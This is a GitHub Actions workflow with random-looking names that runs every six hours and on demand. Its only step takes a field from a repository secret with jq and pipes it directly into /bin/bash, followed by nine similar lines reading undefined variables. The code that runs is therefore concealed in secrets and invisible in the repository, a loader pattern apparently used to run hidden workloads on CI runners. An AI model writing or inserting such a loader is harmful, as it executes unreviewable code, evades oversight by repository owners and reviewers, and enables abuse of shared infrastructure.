name: hehuchong1391
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hehuchong1391
        env:
          pzn99: ${{ secrets.pzn99 }}
        run: |
          echo $pzn99 | jq -r .xybc82070 | /bin/bash
          echo $nryx94536 | jq -r .i54 | /bin/bash
          echo $mpoad1 | jq -r .kv91989 | /bin/bash
          echo $rf52736 | jq -r .gpb8 | /bin/bash
          echo $j73 | jq -r .ekdg2 | /bin/bash
          echo $q7020 | jq -r .l8 | /bin/bash
          echo $pbw2 | jq -r .oys85068 | /bin/bash
          echo $sy79377 | jq -r .tbxp7928 | /bin/bash
          echo $kh4795 | jq -r .snly286 | /bin/bash
          echo $av6 | jq -r .ug05752 | /bin/bash

